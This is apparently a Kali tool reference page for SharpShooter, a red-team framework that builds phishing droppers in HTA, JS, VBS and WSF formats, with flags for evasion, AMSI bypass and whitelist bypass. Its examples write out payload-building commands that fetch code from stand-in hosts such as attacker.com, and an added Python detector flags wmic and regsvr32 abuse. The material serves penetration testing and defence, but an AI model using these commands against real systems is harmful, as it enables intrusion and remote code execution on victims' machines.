
SharpShooter

SharpShooter is a payload creation framework for retrieving and executing arbitrary C# source code. It generates payloads in formats including HTA, JS, VBS, and WSF.

Description

SharpShooter is designed for red team operations and penetration testing, enabling the creation of sophisticated payloads that can evade detection. The tool specializes in generating payloads that execute C# code, delivered in file formats commonly used in phishing campaigns.

Use cases include crafting stageless payloads, implementing application whitelist bypass techniques, and employing anti-sandbox evasion methods. It's particularly valuable for social engineering attacks where JavaScript, VBScript, or HTA files are delivered to targets.

The framework supports multiple COM-based staging techniques and can target different .NET versions, making it versatile across Windows environments. Integration with OffSec's PEN-300 training highlights its role in advanced phishing simulations.

How It Works

SharpShooter generates payloads that download and execute C# source code from remote locations using HTTP/HTTPS or DNS channels. It leverages COM staging (outlook, wmi, wscript), application whitelist bypasses (wmic, regsvr32), and anti-analysis techniques. Payloads are minified and obfuscated, targeting specific .NET versions (2.0 or 4.0) and supporting formats like HTA, JS, VBS, WSF for execution in common Windows interpreters.
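
A defender-side view of the chain described above, as an added example that is not part of SharpShooter or of the original page: it flags process-creation events in which wmic.exe or regsvr32.exe runs with a remote URL in its command line or is spawned by a script host. The event field names, rule names and sample events are constructed assumptions.

```python
import re

# Script hosts that execute the HTA, JS, VBS and WSF formats named above.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Binaries named by the page's application whitelist bypass option.
AWL_BINARIES = {"wmic.exe", "regsvr32.exe"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def findings(event):
    """Return the rule names that one process-creation event matches."""
    image = image_name(event["image"])
    parent = image_name(event["parent_image"])
    urls = URL_RE.findall(event["command_line"])
    hits = []
    if image in AWL_BINARIES and urls:
        hits.append("awl_binary_with_remote_url")
        # Query strings are ignored when checking the file extension.
        if any(u.lower().split("?")[0].endswith((".xsl", ".sct")) for u in urls):
            hits.append("remote_xsl_or_sct")
    if image in AWL_BINARIES and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawned_awl_binary")
    return hits


# Constructed sample events; arguments other than the URL are elided on purpose.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "wmic.exe <args elided> http://stage.example/style.xsl"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "regsvr32.exe <args elided> https://stage.example/a.SCT?x=1"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"regsvr32.exe C:\Apps\vendor\codec.dll"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "wmic.exe os get caption"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(image_name(ev["image"]), findings(ev))
```

The last two events are benign administrative uses of the same binaries and produce no findings, which is the baseline the rules need to preserve.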

Installation

```bash
sudo apt install sharpshooter
```

Flags

--stageless            Create a stageless payload
--dotnetver <ver>      Target .NET Version: 2 or 4
--com <com>            COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
--awl <awl>            Application Whitelist Bypass Technique: wmic, regsvr32
--awlurl <awlurl>      URL to retrieve XSL/SCT payload
--payload <format>     Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk
--sandbox <types>      Anti-sandbox techniques
--amsi <amsi>          AMSI bypass technique
--delivery <type>      Delivery method
--rawscfile <path>     Path to raw shellcode file
--shellcode            Use shellcode payload
--scfile <path>        Path to shellcode file
--refs <refs>          Additional .NET references
--namespace <ns>       C# namespace
--entrypoint <ep>      C# entrypoint method
--web <web>            Web payload URL
--dns <dns>            DNS payload domain
--output <output>      Output filename
--smuggle              Enable payload smuggling
--template <tpl>       Custom template path

Examples

```bash
# Show help message and usage options
sharpshooter -h

# Generate stageless HTA payload
sharpshooter --stageless --payload hta --output payload.hta

# Create JS payload targeting .NET 4 from web URL
sharpshooter --dotnetver 4 --payload js --web http://attacker.com/payload.txt --output payload.js

# Generate VBS payload using WMI COM staging
sharpshooter --com wmi --payload vbs --output payload.vbs

# Create JS payload with WMIC application whitelist bypass
sharpshooter --awl wmic --awlurl http://attacker.com/style.xsl --payload js

# Generate WSF payload with anti-sandbox techniques
sharpshooter --payload wsf --sandbox basic --output payload.wsf

# Create HTA payload from shellcode file
sharpshooter --shellcode --scfile shellcode.bin --payload hta
```

Updated 2026-04-16 (source: kali.org)